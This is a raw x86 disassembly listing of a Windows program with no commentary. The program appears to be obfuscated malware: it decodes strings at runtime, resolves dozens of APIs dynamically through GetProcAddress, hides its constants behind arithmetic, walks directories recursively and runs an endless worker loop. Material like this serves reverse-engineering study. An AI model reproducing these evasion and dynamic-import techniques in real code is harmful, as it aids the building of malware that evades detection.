mov eax, dword_44B0D4
add eax, 0A4h
cmp [ebp+arg_24], eax
jnz loc_441185
loc_440F30: ; CODE XREF: sub_440E84+97�j
movsx eax, word_44B090
mov edx, dword_44B0D4
lea eax, [eax+edx+30D3Eh]
cmp [ebp+arg_24], eax
ja loc_441185
lea eax, [ebp+arg_18]
push eax
lea eax, [ebp+arg_8]
push eax
call ds:dword_44A780 ; CompareFileTime
mov [ebp+var_260], eax
mov eax, dword_44B09C
movsx edx, word_44B0B4
add eax, edx
sub eax, 8
cmp [ebp+var_260], eax
jge short loc_440F87
lea edi, [ebp+var_268]
lea esi, [ebp+arg_18]
movsd
movsd
jmp short loc_440F92
; ---------------------------------------------------------------------------
loc_440F87: ; CODE XREF: sub_440E84+F4�j
lea edi, [ebp+var_268]
lea esi, [ebp+arg_8]
movsd
movsd
loc_440F92: ; CODE XREF: sub_440E84+101�j
lea eax, [ebp+var_258]
push eax
lea eax, [ebp+var_268]
push eax
call ds:dword_44A778 ; FileTimeToSystemTime
mov eax, dword_44B10C
mov edx, dword_44B094
mov ecx, dword_44B0A8
mov esi, dword_44B0DC
mov [ebp+var_26C], esi
movzx edi, [ebp+var_24E]
movzx esi, [ebp+var_250]
lea eax, [eax+eax+36h]
imul esi, eax
mov eax, edi
add eax, esi
movzx esi, [ebp+var_252]
mov edi, dword_44B0C8
add edi, 0Fh
add edi, dword_44B0B0
imul esi, edi
mov edi, dword_44B0AC
add edi, 3Ah
imul esi, edi
add eax, esi
movzx esi, [ebp+var_256]
mov edi, dword_44B124
add edi, 1Ch
imul esi, edi
movsx edi, word_44B090
add edi, 16h
imul esi, edi
lea edx, [edx+edx+3Ch]
imul esi, edx
add eax, esi
movzx edx, [ebp+var_258]
mov esi, dword_44B0D4
lea esi, [ecx+esi+8]
imul edx, esi
mov esi, dword_44B100
add esi, 1Bh
imul edx, esi
mov esi, [ebp+var_26C]
mov edi, esi
lea esi, [esi+edi+8]
imul edx, esi
movsx esi, word_44B0E4
lea ecx, [esi+ecx+32h]
imul edx, ecx
add eax, edx
mov [ebp+var_25C], eax
mov edx, ds:dword_445024
cmp eax, edx
ja loc_441185
sub edx, eax
movsx eax, word_44B118
add eax, 0Bh
cmp edx, eax
jnb loc_441185
movsx eax, word_44B0CC
add eax, 9Dh
cmp [ebp+arg_24], eax
jz short loc_4410B6
push 0
push [ebp+arg_0]
call sub_43BAE4
add esp, 8
jmp loc_441185
; ---------------------------------------------------------------------------
loc_4410B6: ; CODE XREF: sub_440E84+21E�j
push 1
push [ebp+arg_0]
call sub_43BAE4
add esp, 8
jmp loc_441185
; ---------------------------------------------------------------------------
loc_4410C8: ; CODE XREF: sub_440E84+63�j
cmp [ebp+var_112], 2Eh
jz loc_441181
lea eax, [ebp+var_112]
push eax
push [ebp+arg_0]
push offset aSS_0 ; "%s\\%s"
lea eax, [ebp+var_242]
push eax
call ds:dword_44A634
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_440E84
add esp, 154h
jmp short loc_441181
; ---------------------------------------------------------------------------
loc_44111B: ; CODE XREF: sub_440E84+2FF�j
lea eax, [ebp+var_13E]
push eax
push [ebp+var_248]
call ds:dword_446004 ; FindNextFileA
mov ebx, eax
or ebx, ebx
jz short loc_441185
cmp [ebp+var_112], 2Eh
jz short loc_441181
lea eax, [ebp+var_112]
push eax
push [ebp+arg_0]
push offset aSS_0 ; "%s\\%s"
lea eax, [ebp+var_242]
push eax
call ds:dword_44A634
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_440E84
add esp, 154h
loc_441181: ; CODE XREF: sub_440E84+24B�j
; sub_440E84+295�j ...
or ebx, ebx
jnz short loc_44111B
loc_441185: ; CODE XREF: sub_440E84+7A�j
; sub_440E84+A6�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_440E84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44118A proc near ; CODE XREF: sub_443EA2+E�p
; sub_443EA2+1E4�p
var_10088 = dword ptr -10088h
var_10084 = dword ptr -10084h
var_10080 = dword ptr -10080h
var_1007C = dword ptr -1007Ch
var_10078 = word ptr -10078h
var_10070 = dword ptr -10070h
var_10068 = dword ptr -10068h
var_10064 = dword ptr -10064h
var_10060 = dword ptr -10060h
var_10059 = byte ptr -10059h
var_10058 = dword ptr -10058h
var_10054 = dword ptr -10054h
var_10050 = dword ptr -10050h
var_1004C = dword ptr -1004Ch
var_10048 = dword ptr -10048h
var_10043 = byte ptr -10043h
var_44 = dword ptr -44h
var_40 = word ptr -40h
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 10088h
call sub_444C70
push ebx
push esi
push edi
mov [ebp+var_40], 8
push offset dword_44C134
call sub_442838
pop ecx
push eax
call ds:dword_445044
mov [ebp+var_38], eax
lea eax, [ebp+var_2C]
push eax
lea esi, [ebp+var_40]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_0]
push edi
mov edi, [edi]
call dword ptr [edi+30h]
mov ebx, eax
mov eax, dword_44B128
movsx edx, word_44B0A4
add eax, edx
sub eax, 5
cmp ebx, eax
jz short loc_4411EF
xor eax, eax
jmp loc_441847
; ---------------------------------------------------------------------------
loc_4411EF: ; CODE XREF: sub_44118A+5C�j
lea eax, [ebp+var_24]
push eax
push offset dword_44C8A0
mov eax, [ebp+var_2C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44B100
movsx edx, word_44B0E0
add eax, edx
sub eax, 0Bh
cmp ebx, eax
jnz loc_44183C
lea eax, [ebp+var_28]
push eax
mov eax, [ebp+var_24]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
mov eax, dword_44B0F8
sub eax, 7
cmp ebx, eax
jnz loc_441833
and [ebp+var_44], 0
movsx eax, word_44B0F4
add eax, dword_44B0FC
sub eax, 3
mov [ebp+var_1C], eax
jmp loc_441827
; ---------------------------------------------------------------------------
loc_44125B: ; CODE XREF: sub_44118A+6A3�j
mov [ebp+var_18], 2
mov eax, [ebp+var_1C]
mov [ebp+var_10], eax
lea eax, [ebp+var_4]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_24]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
movsx eax, word_44B0A4
add eax, dword_44B0D8
sub eax, 8
cmp ebx, eax
jnz loc_441824
and [ebp+var_10048], 0
lea eax, [ebp+var_10048]
push eax
push offset dword_44C890
mov eax, [ebp+var_4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44B0FC
sub eax, 3
cmp ebx, eax
jnz loc_441800
cmp [ebp+var_10048], 0
jz loc_441800
lea eax, [ebp+var_20]
push eax
mov eax, [ebp+var_10048]
push eax
mov edi, [eax]
call dword ptr [edi+0F8h]
mov ebx, eax
or ebx, ebx
jnz loc_441800
lea eax, [ebp+var_10043]
push eax
push [ebp+var_20]
call sub_43C65F
movsx eax, word_44B114
movsx edx, word_44B108
add eax, edx
sub eax, 7
push eax
push offset dword_448230
lea eax, [ebp+var_10043]
push eax
call sub_43F8DA
add esp, 14h
mov edi, dword_44B128
add edi, 0FFFFh
cmp eax, edi
jz loc_441800
cmp [ebp+arg_4], 0
jz short loc_441376
mov eax, [ebp+var_10048]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
xor eax, eax
inc eax
jmp loc_441847
; ---------------------------------------------------------------------------
loc_441376: ; CODE XREF: sub_44118A+1CD�j
and [ebp+var_1007C], 0
lea eax, [ebp+var_1007C]
push eax
push offset dword_44C8C0
mov eax, [ebp+var_4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44B134
add eax, dword_44B0D8
sub eax, 7
cmp ebx, eax
jnz loc_441800
mov [ebp+var_10059], 44h
push offset byte_44C129
call sub_43DF30
mov edi, dword_44B138
dec edi
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_43F8DA
add esp, 10h
movsx esi, word_44B0E0
mov edx, dword_44B124
lea esi, [esi+edx+0FFF5h]
cmp eax, esi
jz short loc_4413F6
mov [ebp+var_10059], 43h
loc_4413F6: ; CODE XREF: sub_44118A+263�j
push offset byte_44C121
call sub_43DF30
movsx edi, word_44B12C
sub edi, 3
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_43F8DA
add esp, 10h
movsx esi, word_44B090
lea edi, [eax+esi+2]
mov [ebp+var_10068], edi
mov [ebp+var_10054], edi
loc_441432: ; CODE XREF: sub_44118A+2BE�j
mov eax, [ebp+var_10054]
cmp [ebp+eax+var_10043], 26h
jz short loc_44144A
inc [ebp+var_10054]
jmp short loc_441432
; ---------------------------------------------------------------------------
loc_44144A: ; CODE XREF: sub_44118A+2B6�j
mov eax, [ebp+var_10054]
mov edx, dword_44B094
movsx ecx, word_44B114
add edx, ecx
sub edx, 3
mov [ebp+eax+var_10043], dl
mov eax, [ebp+var_10068]
lea eax, [ebp+eax+var_10043]
push eax
call ds:dword_445054
mov [ebp+var_10080], eax
push offset word_44C11A
call sub_43DF30
movsx edi, word_44B108
add edi, dword_44B0A8
sub edi, 8
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_43F8DA
add esp, 14h
mov esi, dword_44B094
add esi, 3
mov edi, eax
add edi, esi
mov [ebp+var_10068], edi
mov [ebp+var_10054], edi
loc_4414C7: ; CODE XREF: sub_44118A+353�j
mov eax, [ebp+var_10054]
cmp [ebp+eax+var_10043], 26h
jz short loc_4414DF
inc [ebp+var_10054]
jmp short loc_4414C7
; ---------------------------------------------------------------------------
loc_4414DF: ; CODE XREF: sub_44118A+34B�j
mov eax, [ebp+var_10054]
mov edx, dword_44B0D8
add edx, dword_44B0C8
sub edx, 7
mov [ebp+eax+var_10043], dl
mov eax, [ebp+var_10068]
lea eax, [ebp+eax+var_10043]
push eax
call ds:dword_445054
pop ecx
mov [ebp+var_10060], eax
movsx eax, word_44B114
add eax, dword_44B0C4
sub eax, 7
cmp [ebp+var_10080], eax
ja short loc_4415A2
movsx eax, word_44B118
movsx edx, word_44B120
add eax, edx
sub eax, 11h
mov [ebp+var_1004C], eax
jmp short loc_44158A
; ---------------------------------------------------------------------------
loc_441549: ; CODE XREF: sub_44118A+416�j
mov edi, [ebp+var_1004C]
mov esi, edi
shl esi, 2
cmp ds:dword_446130[esi], 0
jz short loc_441584
mov edx, [ebp+var_10060]
cmp ds:dword_445060[esi], edx
jnz short loc_441584
mov dl, ds:byte_447200[edi]
cmp dl, [ebp+var_10059]
jnz short loc_441584
and ds:dword_446130[edi*4], 0
loc_441584: ; CODE XREF: sub_44118A+3D2�j
; sub_44118A+3E1�j ...
inc [ebp+var_1004C]
loc_44158A: ; CODE XREF: sub_44118A+3BD�j
mov eax, dword_44B134
add eax, 3E2h
add eax, dword_44B148
cmp [ebp+var_1004C], eax
jb short loc_441549
loc_4415A2: ; CODE XREF: sub_44118A+3A2�j
call ds:dword_44A770 ; GetTickCount
mov [ebp+var_10064], eax
mov eax, dword_44B09C
movsx edx, word_44B12C
add eax, edx
sub eax, 7
mov [ebp+var_10050], eax
jmp short loc_441617
; ---------------------------------------------------------------------------
loc_4415C7: ; CODE XREF: sub_44118A+49D�j
mov edi, [ebp+var_10050]
shl edi, 2
cmp ds:dword_446130[edi], 0
jz short loc_441611
mov edi, ds:dword_449660[edi]
mov esi, dword_44B104
add esi, 0EA5Eh
mov edx, dword_44B110
sub edx, 3
imul esi, edx
add edi, esi
cmp edi, [ebp+var_10064]
jnb short loc_441611
mov edi, [ebp+var_10050]
and ds:dword_446130[edi*4], 0
loc_441611: ; CODE XREF: sub_44118A+44E�j
; sub_44118A+477�j
inc [ebp+var_10050]
loc_441617: ; CODE XREF: sub_44118A+43B�j
mov eax, dword_44B098
add eax, 3E3h
cmp [ebp+var_10050], eax
jb short loc_4415C7
mov eax, dword_44B0BC
add eax, dword_44B0D4
dec eax
mov [ebp+var_10058], eax
jmp short loc_441653
; ---------------------------------------------------------------------------
loc_44163D: ; CODE XREF: sub_44118A+4DF�j
mov edi, [ebp+var_10058]
cmp ds:dword_446130[edi*4], 0
jz short loc_44166B
inc [ebp+var_10058]
loc_441653: ; CODE XREF: sub_44118A+4B1�j
mov eax, dword_44B10C
add eax, 3E5h
add eax, dword_44B0EC
cmp [ebp+var_10058], eax
jb short loc_44163D
loc_44166B: ; CODE XREF: sub_44118A+4C1�j
mov edi, [ebp+var_10058]
mov esi, [ebp+var_10060]
mov ds:dword_445060[edi*4], esi
mov eax, edi
mov dl, [ebp+var_10059]
mov ds:byte_447200[eax], dl
movsx eax, word_44B108
add eax, dword_44B110
sub eax, 0Dh
cmp [ebp+var_10080], eax
jbe loc_441750
mov esi, dword_44B094
add esi, 0FFFDh
add esi, dword_44B104
mov ds:word_447A50[edi*2], si
mov eax, dword_44B094
movsx edx, word_44B118
add eax, edx
sub eax, 9
mov [ebp+var_10088], eax
jmp short loc_44173A
; ---------------------------------------------------------------------------
loc_4416DC: ; CODE XREF: sub_44118A+5C2�j
mov edi, [ebp+var_10088]
mov esi, edi
shl esi, 2
cmp ds:dword_446130[esi], 0
jz short loc_441734
movzx edx, ds:word_447A50[edi*2]
movsx ecx, word_44B118
add ecx, 0FFF6h
cmp edx, ecx
jz short loc_441734
mov edx, [ebp+var_10060]
cmp ds:dword_445060[esi], edx
jnz short loc_441734
mov dl, ds:byte_447200[edi]
cmp dl, [ebp+var_10059]
jnz short loc_441734
lea edi, ds:447A50h[edi*2]
inc word ptr [edi]
jmp short loc_441767
; ---------------------------------------------------------------------------
loc_441734: ; CODE XREF: sub_44118A+565�j
; sub_44118A+57E�j ...
inc [ebp+var_10088]
loc_44173A: ; CODE XREF: sub_44118A+550�j
movsx eax, word_44B108
add eax, 3E3h
cmp [ebp+var_10088], eax
jb short loc_4416DC
jmp short loc_441767
; ---------------------------------------------------------------------------
loc_441750: ; CODE XREF: sub_44118A+519�j
mov edi, [ebp+var_10058]
mov esi, dword_44B134
sub esi, 3
mov ds:word_447A50[edi*2], si
loc_441767: ; CODE XREF: sub_44118A+5A8�j
; sub_44118A+5C4�j
call ds:dword_44A770 ; GetTickCount
mov edi, [ebp+var_10058]
mov ds:dword_449660[edi*4], eax
lea esi, off_44B214
mov ds:dword_446130[edi*4], esi
mov edi, [ebp+var_10058]
lea edi, ds:446130h[edi*4]
mov [ebp+var_10084], edi
mov eax, edi
push eax
mov esi, [eax]
call dword ptr [esi+4]
mov [ebp+var_10078], 9
mov edi, [ebp+var_10058]
lea edi, ds:446130h[edi*4]
mov [ebp+var_10070], edi
lea esi, [ebp+var_10078]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_1007C]
push edi
mov edi, [edi]
call dword ptr [edi+0A4h]
mov ebx, eax
inc [ebp+var_10058]
lea eax, [ebp+var_10078]
push eax
call ds:dword_44ABB0
mov eax, [ebp+var_1007C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_441800: ; CODE XREF: sub_44118A+14E�j
; sub_44118A+15B�j ...
cmp [ebp+var_10048], 0
jz short loc_441815
mov eax, [ebp+var_10048]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_441815: ; CODE XREF: sub_44118A+67D�j
cmp [ebp+var_4], 0
jz short loc_441824
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_441824: ; CODE XREF: sub_44118A+11C�j
; sub_44118A+68F�j
inc [ebp+var_1C]
loc_441827: ; CODE XREF: sub_44118A+CC�j
mov eax, [ebp+var_28]
cmp [ebp+var_1C], eax
jb loc_44125B
loc_441833: ; CODE XREF: sub_44118A+AF�j
mov eax, [ebp+var_24]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_44183C: ; CODE XREF: sub_44118A+90�j
mov eax, [ebp+var_2C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
xor eax, eax
loc_441847: ; CODE XREF: sub_44118A+60�j
; sub_44118A+1E7�j
pop edi
pop esi
pop ebx
leave
retn
sub_44118A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44184C proc near ; DATA XREF: sub_43F328+100�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push edi
mov eax, [ebp+arg_4]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_447614 ; DefWindowProcA
pop edi
pop ebp
retn 10h
sub_44184C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44186A proc near ; DATA XREF: .data:off_44B258�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
push offset dword_44C8F0
push esi
call ds:dword_44A644
or eax, eax
jz short loc_441896
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_4418DE
; ---------------------------------------------------------------------------
loc_441896: ; CODE XREF: sub_44186A+1A�j
push offset dword_44C870
push esi
call ds:dword_44A644
or eax, eax
jz short loc_4418B6
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_4418DE
; ---------------------------------------------------------------------------
loc_4418B6: ; CODE XREF: sub_44186A+3A�j
push offset dword_44C830
push esi
call ds:dword_44A644
or eax, eax
jz short loc_4418D6
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_4418DE
; ---------------------------------------------------------------------------
loc_4418D6: ; CODE XREF: sub_44186A+5A�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_4418DE: ; CODE XREF: sub_44186A+2A�j
; sub_44186A+4A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_44186A endp
; =============== S U B R O U T I N E =======================================
sub_4418E5 proc near ; DATA XREF: .data:0044B248�o
mov eax, 80004001h
retn 18h
sub_4418E5 endp
; =============== S U B R O U T I N E =======================================
sub_4418ED proc near ; CODE XREF: sub_43F328+C�p
push edi
push offset dword_44C10C
call sub_43DF30
pop ecx
push eax
call ds:dword_4475E8 ; GetModuleHandleA
mov dword_44B15C, eax
test eax, eax
jnz short loc_441920
push offset word_44C0FE
call sub_43DF30
pop ecx
push eax
call ds:dword_448244 ; LoadLibraryA
mov dword_44B15C, eax
loc_441920: ; CODE XREF: sub_4418ED+1A�j
push offset byte_44C0EB
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A60C, eax
push offset dword_44C0D8
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_449648, eax
push offset word_44C0C6
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_447614, eax
push offset byte_44C0B5
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_448224, eax
push offset byte_44C0A1
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445050, eax
push offset dword_44C090
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_446010, eax
push offset byte_44C079
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4475F0, eax
push offset word_44C06A
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_448368, eax
push offset byte_44C05D
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445004, eax
push offset byte_44C04B
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A628, eax
push offset word_44C03A
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A650, eax
push offset dword_44C028
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44ABA4, eax
push offset byte_44C019
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_448220, eax
push offset dword_44C00C
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A620, eax
push offset byte_44BFFD
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A640, eax
push offset byte_44BFEF
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445040, eax
push offset byte_44BFDD
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4470DC, eax
push offset byte_44BFCD
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445014, eax
push offset byte_44BFC1
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_447A40, eax
push offset byte_44BFB5
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A604, eax
push offset byte_44BFA3
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4475F8, eax
push offset byte_44BF91
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A654, eax
push offset byte_44BF83
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A658, eax
push offset byte_44BF6F
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A77C, eax
push offset word_44BF5E
call sub_43DF30
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A638, eax
push offset dword_44BF48
call sub_43DF30
add esp, 68h
push eax
push dword_44B15C
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445048, eax
pop edi
retn
sub_4418ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_441BFD proc near ; DATA XREF: .data:0044B21C�o
push ebp
mov ebp, esp
movsx eax, word_44B0A0
sub eax, 5
cmp ds:dword_44A784, eax
jbe short loc_441C1D
push offset dword_44A784
call ds:dword_445010 ; InterlockedDecrement
loc_441C1D: ; CODE XREF: sub_441BFD+13�j
mov eax, ds:dword_44A784
pop ebp
retn 4
sub_441BFD endp
; =============== S U B R O U T I N E =======================================
sub_441C26 proc near ; CODE XREF: sub_43F328+1B�p
push edi
push offset dword_44BF38
call sub_43DF30
pop ecx
push eax
call ds:dword_4475E8 ; GetModuleHandleA
mov dword_44B168, eax
test eax, eax
jnz short loc_441C59
push offset dword_44BF28
call sub_43DF30
pop ecx
push eax
call ds:dword_448244 ; LoadLibraryA
mov dword_44B168, eax
loc_441C59: ; CODE XREF: sub_441C26+1A�j
push offset word_44BF16
call sub_43DF30
push eax
push dword_44B168
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445044, eax
push offset byte_44BF05
call sub_43DF30
push eax
push dword_44B168
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44ABA0, eax
push offset byte_44BEF5
call sub_43DF30
push eax
push dword_44B168
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44ABB0, eax
push offset word_44BEE6
call sub_43DF30
push eax
push dword_44B168
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445038, eax
push offset word_44BED6
call sub_43DF30
add esp, 14h
push eax
push dword_44B168
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_448254, eax
pop edi
retn
sub_441C26 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_441CEA proc near ; DATA XREF: sub_43A324+15D�o
var_A = byte ptr -0Ah
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov edi, [ebp+arg_0]
push offset sub_440237
push dword ptr fs:0
mov fs:0, esp
push offset word_44BECE
call sub_43DF30
push dword ptr [edi]
push eax
lea esi, [ebp+var_A]
push esi
call ds:dword_44A634
add esp, 10h
loc_441D20: ; CODE XREF: sub_441CEA+60�j
push 0
push dword ptr [edi]
lea eax, [ebp+var_A]
push eax
call sub_43BF7B
movsx eax, word_44B0E0
movsx edx, word_44B108
add eax, edx
sub eax, 0Dh
push eax
call ds:dword_44A630
add esp, 10h
jmp short loc_441D20
sub_441CEA endp
; ---------------------------------------------------------------------------
pop edi
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
sub_441D52 proc near ; CODE XREF: sub_43F328+2F�p
push edi
push offset word_44BEBE
call sub_43DF30
pop ecx
push eax
call ds:dword_4475E8 ; GetModuleHandleA
mov dword_44B178, eax
test eax, eax
jnz short loc_441D85
push offset word_44BEAE
call sub_43DF30
pop ecx
push eax
call ds:dword_448244 ; LoadLibraryA
mov dword_44B178, eax
loc_441D85: ; CODE XREF: sub_441D52+1A�j
push offset byte_44BE9D
call sub_43DF30
push eax
push dword_44B178
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4475EC, eax
push offset byte_44BE89
call sub_43DF30
push eax
push dword_44B178
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44503C, eax
push offset word_44BE7A
call sub_43DF30
add esp, 0Ch
push eax
push dword_44B178
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A618, eax
pop edi
retn
sub_441D52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_441DDE proc near ; CODE XREF: sub_4407DD+D0�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_44B1D0
push offset dword_44B190
push [ebp+arg_4]
push [ebp+arg_0]
call sub_444228
pop ebp
retn
sub_441DDE endp
; =============== S U B R O U T I N E =======================================
sub_441DF8 proc near ; DATA XREF: sub_440237+7�o
mov eax, dword_44B110
movsx edx, word_44B0E4
add eax, edx
sub eax, 0Dh
push eax
call ds:dword_44A660 ; ExitThread
retn
sub_441DF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_441E11 proc near ; CODE XREF: sub_43BAE4+2E2�p
; sub_43D966+1BC�p ...
var_120A = byte ptr -120Ah
var_110B = byte ptr -110Bh
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 120Ch
call sub_444C70
push ebx
push esi
push edi
push offset byte_44BA4B
call sub_43DF30
push eax
lea edi, [ebp+var_FFF]
push edi
call ds:dword_44A634
add esp, 0Ch
mov eax, dword_44B094
mov esi, eax
add esi, dword_44B0BC
dec esi
jmp short loc_441E63
; ---------------------------------------------------------------------------
loc_441E4C: ; CODE XREF: sub_441E11+58�j
cmp [ebp+esi+var_FFF], 23h
jnz short loc_441E62
mov eax, dword_44B0EC
mov [ebp+esi+var_FFF], al
loc_441E62: ; CODE XREF: sub_441E11+43�j
inc esi
loc_441E63: ; CODE XREF: sub_441E11+39�j
cmp esi, 0FFFh
jb short loc_441E4C
mov eax, dword_44B0EC
movsx edx, word_44B0F0
add eax, edx
sub eax, 5
mov [ebp+var_1004], eax
mov eax, dword_44B128
movsx edx, word_44B11C
mov ebx, eax
add ebx, edx
sub ebx, 2
cmp [ebp+arg_0], 0
jnz short loc_441EFB
loc_441E9B: ; CODE XREF: sub_441E11+E8�j
mov eax, [ebp+arg_4]
cmp [ebp+var_1004], eax
jnz short loc_441EBD
lea eax, [ebp+ebx+var_FFF]
push eax
push offset dword_44A670
call sub_444C90
jmp loc_44213E
; ---------------------------------------------------------------------------
loc_441EBD: ; CODE XREF: sub_441E11+93�j
lea ecx, [ebp+ebx+var_FFF]
or eax, 0FFFFFFFFh
loc_441EC7: ; CODE XREF: sub_441E11+BB�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_441EC7
add ebx, eax
add ebx, 1
inc [ebp+var_1004]
movsx eax, [ebp+ebx+var_FFF]
movsx edx, word_44B11C
add edx, dword_44B0AC
sub edx, 4
cmp eax, edx
jz loc_44213E
jmp short loc_441E9B
; ---------------------------------------------------------------------------
loc_441EFB: ; CODE XREF: sub_441E11+88�j
mov eax, dword_44B210
mov [ebp+var_1008], eax
mov eax, dword_44B0D0
mov edx, [ebp+arg_0]
mov ecx, dword_44B0C0
sub ecx, 3
mov [edx+eax], cl
movsx eax, word_44B120
mov ebx, eax
add ebx, dword_44B124
sub ebx, 0Ah
movsx eax, word_44B14C
movsx edx, word_44B0B8
add eax, edx
sub eax, 6
mov [ebp+var_1004], eax
